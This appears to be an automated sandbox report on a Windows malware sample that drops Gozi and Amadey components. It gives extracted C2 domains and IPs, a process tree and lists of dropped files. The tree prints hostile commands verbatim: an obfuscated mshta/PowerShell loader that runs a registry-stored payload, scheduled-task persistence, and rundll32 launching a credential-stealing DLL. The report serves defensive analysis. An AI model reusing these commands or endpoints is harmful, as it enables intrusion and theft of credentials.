Analysis

  • max time kernel
    150s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    28/12/2022, 12:01

General

  • Target

    file.exe

  • Size

    229KB

  • MD5

    96aa7e5cd62710829a1f3b17922fc117

  • SHA1

    edd95f2c58e1c5dde12aff974e6d42ea7469695b

  • SHA256

    d16704455547e98721bdc8ebc9a233376b24f086469b707fccf10da54eb77744

  • SHA512

    e0d619d48fde2af62fef20ec4ff65e0d24852150ca560d6461a851843f775f516fa8cb63d32ec6ef2556aa8d53a3c78c4da529a91b67a9ce59169c377c162f74

  • SSDEEP

    3072:kXRcBLv/M7j5vuvW1YPG8vqGqSMiustPtYKs/xAI99:G6LvE7N1WlcLQ1YDZ

Malware Config

Extracted
  • Family
    gozi

Extracted
  • Family
    gozi
  • Botnet
    22500
  • C2
    confisg.edge.skype.com
    http://s28bxcw.xyz
    config.edgse.skype.com
    http://89.43.107.7
  • Attributes
    base_path: /recycle/
    build: 250249
    exe_type: loader
    extension: .alo
    server_id: 50
  • rsa_pubkey.plain
  • aes.plain

Extracted
  • Family
    amadey
  • Version
    3.63
  • C2
    62.204.41.165/g8sjnd3xe/index.php

Extracted
  • Family
    gozi
  • Botnet
    22500
  • C2
    confisg.edge.skype.com
    http://5icvzwz.xyz
    http://185.14.45.80
  • Attributes
    base_path: /recycle/
    build: 250249
    exe_type: worker
    extension: .alo
    server_id: 50
  • rsa_pubkey.plain
  • aes.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detect Amadey credential stealer module 2 IoCs
  • Detects Smokeloader packer 1 IoCs
  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 6 IoCs
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 2 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Accesses Microsoft Outlook profiles 1 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 27 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 63 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    PID:3436
  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2640
    • C:\Users\Admin\AppData\Local\Temp\file.exe
      "C:\Users\Admin\AppData\Local\Temp\file.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:3104
    • C:\Windows\system32\regsvr32.exe
      regsvr32 /s C:\Users\Admin\AppData\Local\Temp\DD36.dll
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4260
      • C:\Windows\SysWOW64\regsvr32.exe
        /s C:\Users\Admin\AppData\Local\Temp\DD36.dll
        3⤵
        • Loads dropped DLL
        PID:3760
    • C:\Users\Admin\AppData\Local\Temp\DF4A.exe
      C:\Users\Admin\AppData\Local\Temp\DF4A.exe
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:3896
      • C:\Users\Admin\AppData\Local\Temp\cb465ca805\nbveek.exe
        "C:\Users\Admin\AppData\Local\Temp\cb465ca805\nbveek.exe"
        3⤵
        • Executes dropped EXE
        PID:4564
    • C:\Users\Admin\AppData\Local\Temp\DFF7.exe
      C:\Users\Admin\AppData\Local\Temp\DFF7.exe
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4944
      • C:\Users\Admin\AppData\Local\Temp\cb465ca805\nbveek.exe
        "C:\Users\Admin\AppData\Local\Temp\cb465ca805\nbveek.exe"
        3⤵
        • Executes dropped EXE
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:4784
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\cb465ca805\nbveek.exe" /F
          4⤵
          • Creates scheduled task(s)
          PID:4644
        • C:\Windows\SysWOW64\rundll32.exe
          "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Accesses Microsoft Outlook profiles
          • outlook_win_path
          PID:4120
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Enkw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Enkw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\7088CE6E-0F81-227B-19A4-B3765D18970A\\\MaskCollision'));if(!window.flag)close()</script>"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:1108
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fxsbvfxfwx -value gp; new-alias -name xpexgpwhwd -value iex; xpexgpwhwd ([System.Text.Encoding]::ASCII.GetString((fxsbvfxfwx "HKCU:Software\AppDataLow\Software\Microsoft\7088CE6E-0F81-227B-19A4-B3765D18970A").TextValue))
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1000
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\anlvrfou\anlvrfou.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4416
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA15C.tmp" "c:\Users\Admin\AppData\Local\Temp\anlvrfou\CSCC0C74C54BDBF44E9B430B7331D86AE9B.TMP"
            5⤵
            PID:532
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lag1hfin\lag1hfin.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3968
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA207.tmp" "c:\Users\Admin\AppData\Local\Temp\lag1hfin\CSCCC7BA64E4C6743BFB47538CD925B52A.TMP"
            5⤵
            PID:3976
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\DD36.dll"
      2⤵
      • Suspicious use of SetThreadContext
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:4812
      • C:\Windows\system32\PING.EXE
        ping localhost -n 5
        3⤵
        • Runs ping.exe
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        PID:3528
    • C:\Windows\syswow64\cmd.exe
      "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
      2⤵
      PID:328
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    PID:3696
  • C:\Users\Admin\AppData\Local\Temp\cb465ca805\nbveek.exe
    C:\Users\Admin\AppData\Local\Temp\cb465ca805\nbveek.exe
    1⤵
    • Executes dropped EXE
    PID:1192
  • C:\Users\Admin\AppData\Local\Temp\cb465ca805\nbveek.exe
    C:\Users\Admin\AppData\Local\Temp\cb465ca805\nbveek.exe
    1⤵
    • Executes dropped EXE
    PID:4976

Network

MITRE ATT&CK Enterprise v6


Downloads

  • C:\Users\Admin\AppData\Local\Temp\DD36.dll
    Filesize 584KB
    MD5 71bb495869bfff145090bdb878800130
    SHA1 5d1e298129bc9c8bf6d1b5d3d9f321a8858e9ab5
    SHA256 9475ff9c5e05af184d06a10b33225f74e89cb941495a82bf4038df98169a432f
    SHA512 ef22db3f32bf5cd34bc69245c41e9eea8bff7b61c8062631a0817744155e802c7caf4f2711ff653572a15903fc07b1af283cd2289d75f268c22eec14ae173c73

  • C:\Users\Admin\AppData\Local\Temp\DF4A.exe
    Filesize 235KB
    MD5 1d641e8215a82151e8925673bfb171a1
    SHA1 12885d250304d50920b79a00524250eaac5a7741
    SHA256 5882c280879e455296e2ff9e0570d6dfe4780cf18e62e7c8ba346a97a719d445
    SHA512 b6791f1b56ee4e992bc4726a7a6cbdbef10bbfad3eb1dfa968679344932ab06d76640e49d5018adb3ab386b36917e12b5d7a93e9d27c4a28af4ac1b8896ec6ce

  • C:\Users\Admin\AppData\Local\Temp\DFF7.exe
    Filesize 235KB
    MD5 1d641e8215a82151e8925673bfb171a1
    SHA1 12885d250304d50920b79a00524250eaac5a7741
    SHA256 5882c280879e455296e2ff9e0570d6dfe4780cf18e62e7c8ba346a97a719d445
    SHA512 b6791f1b56ee4e992bc4726a7a6cbdbef10bbfad3eb1dfa968679344932ab06d76640e49d5018adb3ab386b36917e12b5d7a93e9d27c4a28af4ac1b8896ec6ce

  • C:\Users\Admin\AppData\Local\Temp\RESA15C.tmp
    Filesize 1KB
    MD5 3acebf6571b30a0efbb8da48477038fa
    SHA1 73fad39fbd0a02c61fdc1fd652a600efbbfae103
    SHA256 2632119439dcd985e36efde3e4c072de78ea15026aada8c1128d8b844eae2a28
    SHA512 216b2159ed4aa76edc3304890f5a1118b866c729ecd7de5473cb2ff10d7c7406da4afb01fac332f8b41918daa778c1998450540071813ab3dbc5d64aaecc6f45

  • C:\Users\Admin\AppData\Local\Temp\RESA207.tmp
    Filesize 1KB
    MD5 dd04aece8c51798c9bed56b463a89220
    SHA1 4343b1c7e56be8b2e42ba43ffd76728e30a8a822
    SHA256 d48dd6b0511d2f2c683c0ae40e3cacd27495225c391cce4e64bb400ae1549acd
    SHA512 b41071e8f4218dd7fcef407ca024653b8dd0c3659b4de4357f61d9aeb5eef17282ecea78f36d8230638652be92227d47f762900995c2c811da0235be35ca835f

  • C:\Users\Admin\AppData\Local\Temp\anlvrfou\anlvrfou.dll
    Filesize 3KB
    MD5 8e3f28ef3a22b18d0bb57316fc8f7545
    SHA1 0563e00e9c9ab3ce9c6e2777afd2eab9fc556693
    SHA256 667e58870c5c157c9ea2a7ca48f9dffa22e577fa3b9fcec57319c970024844e5
    SHA512 49941368a216d73123bdebf89202810bbce0426015f69c1ca5706cf717909227ed760a92a78de908fd0fa532ac89009996c0ec463a6cfb6f47cd9102a6092176

  • C:\Users\Admin\AppData\Local\Temp\cb465ca805\nbveek.exe
    Filesize 235KB
    MD5 1d641e8215a82151e8925673bfb171a1
    SHA1 12885d250304d50920b79a00524250eaac5a7741
    SHA256 5882c280879e455296e2ff9e0570d6dfe4780cf18e62e7c8ba346a97a719d445
    SHA512 b6791f1b56ee4e992bc4726a7a6cbdbef10bbfad3eb1dfa968679344932ab06d76640e49d5018adb3ab386b36917e12b5d7a93e9d27c4a28af4ac1b8896ec6ce

  • C:\Users\Admin\AppData\Local\Temp\lag1hfin\lag1hfin.dll
    Filesize 3KB
    MD5 e5a00a091100652d4e82f691cd5b9536
    SHA1 41ec84d32e0efd0667f7fce32fa470f21485b4d3
    SHA256 71a26f2bd7c5c2bd3dd323cc3c2ffcf26b63607af9418da05df7ffbcfdc5dbb3
    SHA512 d11a7609371f3a8ef58cdc8964bee5a2f7c72d26e67504d7509e7293be19f1f5bdb4b0c7e33450c418a254a65634de396845f486a3345c0e39e4e1ec3c42583f

  • C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll
    Filesize 126KB
    MD5 70134bf4d1cd851b382b2930a2e182ea
    SHA1 8454d476c0d36564792b49be546593af3eab29f4
    SHA256 5e4cb0cc51202cef27c4f5da63362ceee8c29a03e61ac19efda3c137b657d9ef
    SHA512 1af07ab22359f69fe32e359883f7d31f3068582ba0eddcb1faf6bf7686f32f51e36cdf645ac9dd727a4bf9b8c390245d7e71faf17c1a18ff3054c55f19c770bd

  • \??\c:\Users\Admin\AppData\Local\Temp\anlvrfou\CSCC0C74C54BDBF44E9B430B7331D86AE9B.TMP
    Filesize 652B
    MD5 2854389483877c6b3c939c9591307697
    SHA1 7922d83d60ce84a1f8d56c2974d70f4ac5325f12
    SHA256 11371b60c998a14799a3d1bc6599f99e3aa2f91255eea4c9726493f2435ab739
    SHA512 27a4cbd3ee15df1770c2527c6e675bb9ab38587de41ce971bcaee6946d9cfc13e37f1344124e4063c60c75a9d0b3f076ea6fe2f916942c474754b365176854d0

  • \??\c:\Users\Admin\AppData\Local\Temp\anlvrfou\anlvrfou.0.cs
    Filesize 408B
    MD5 f58cc7462a9dc35fa5ccf9d605d846f9
    SHA1 c864bbe18005d5c8e0c95cf71cf82afc1f2222a0
    SHA256 adea20d896d1565230e0799ac1e5e14719062ce0e00080c412222a98bddcadcb
    SHA512 d13c80ea909a9f6ebedeaa8d4e73cfd01d3d8b465b02b1f5663f22ef189e9f0b5329b60fcb6c888334c370c69ca92dee1a9b5f0b0262377132e4a6822970e6f1

  • \??\c:\Users\Admin\AppData\Local\Temp\anlvrfou\anlvrfou.cmdline
    Filesize 369B
    MD5 4e38725de3957c26eec00b3a2f51bfac
    SHA1 f7849021d58aec6e675b67cb9c3c672f462306b3
    SHA256 7298d26d510eedac597c670b4fdbc54556bf69f69b2e30997022b7e1d906b142
    SHA512 9de0b0b5b1d2aa0eba395b772fc36de517fec212107248301bc4ab4e6a5ebe38c8fb4ea22ead434616b4653f19b3482cec572b70f77c05e74cdf1bc863a6aa1f

  • \??\c:\Users\Admin\AppData\Local\Temp\lag1hfin\CSCCC7BA64E4C6743BFB47538CD925B52A.TMP
    Filesize 652B
    MD5 cf994197fe55bc349bc6e0cc85fb182d
    SHA1 795a49c83dc340f1675c71ffb1f5d71efe6b9e2b
    SHA256 38f1d2c42291f49df649c76539839a797ab99db458aff3efba66fec56b37101c
    SHA512 10af0dbda2a96e45af015b6d84e0c56de71880b5c3f83d379876c3b75ab956e71cfaaab7d9b6755fbfb0ee05e708f3adcab6bce05b0d1de3e568bf5e72b8de3d

  • \??\c:\Users\Admin\AppData\Local\Temp\lag1hfin\lag1hfin.0.cs
    Filesize 408B
    MD5 0a5374e53f44ac8b609707a893f72b21
    SHA1 83ec00746897bcacf4c5a049b7e090d057f62cf9
    SHA256 0388c68b7b848cb08941edbfe4bcaa8f6df3c461df1c9a7542103e279f64c5f9
    SHA512 ce62cb7723a6fcb5448c7c096c293a503662888f75f1a92ea8a9a15955e82ad6f7773829604633782f0e3e8d5bb07286bc281a94d2f99f0f57d4cea4e873cdd4

  • \??\c:\Users\Admin\AppData\Local\Temp\lag1hfin\lag1hfin.cmdline
    Filesize 369B
    MD5 dff1d36d9cd0c96dbedcfa54e0dbd203
    SHA1 6b8f427088bbc096374575e44bf877be3c9a6dd2
    SHA256 96632ca187e24344a9b5fef2bff6187f34b9be25b4cc2a8ed5fb6ae13d732055
    SHA512 a8bdd760730ff83fc1fdad2864bd377f53d68c3ae7a3f76b110bce638ba9c971fc32eca1373e341d1c87e183a8ba15d755528e9fdc6f95c4219a1a3c6095765a

  • memory/328-195-0x00000000010D0000-0x0000000001166000-memory.dmp
    Filesize 600KB
  • memory/328-194-0x0000000000936B20-0x0000000000936B24-memory.dmp
    Filesize 4B
  • memory/1000-186-0x00000266BB630000-0x00000266BB66C000-memory.dmp
    Filesize 240KB
  • memory/1000-168-0x00000266BA9C0000-0x00000266BA9E2000-memory.dmp
    Filesize 136KB
  • memory/1000-169-0x00007FF851F40000-0x00007FF852A01000-memory.dmp
    Filesize 10.8MB
  • memory/1000-185-0x00007FF851F40000-0x00007FF852A01000-memory.dmp
    Filesize 10.8MB
  • memory/2640-190-0x0000000008790000-0x0000000008832000-memory.dmp
    Filesize 648KB
  • memory/3104-135-0x0000000000400000-0x000000000045E000-memory.dmp
    Filesize 376KB
  • memory/3104-136-0x0000000000400000-0x000000000045E000-memory.dmp
    Filesize 376KB
  • memory/3104-134-0x0000000002190000-0x0000000002199000-memory.dmp
    Filesize 36KB
  • memory/3104-133-0x0000000000460000-0x0000000000560000-memory.dmp
    Filesize 1024KB
  • memory/3436-188-0x00000230F1270000-0x00000230F1312000-memory.dmp
    Filesize 648KB
  • memory/3528-192-0x000001121E180000-0x000001121E222000-memory.dmp
    Filesize 648KB
  • memory/3696-189-0x000001A2AD130000-0x000001A2AD1D2000-memory.dmp
    Filesize 648KB
  • memory/3760-157-0x00000000015D0000-0x00000000015DD000-memory.dmp
    Filesize 52KB
  • memory/3760-155-0x0000000001310000-0x0000000001316000-memory.dmp
    Filesize 24KB
  • memory/3760-141-0x0000000000400000-0x0000000000495000-memory.dmp
    Filesize 596KB
  • memory/4812-191-0x00000237BEF30000-0x00000237BEFD2000-memory.dmp
    Filesize 648KB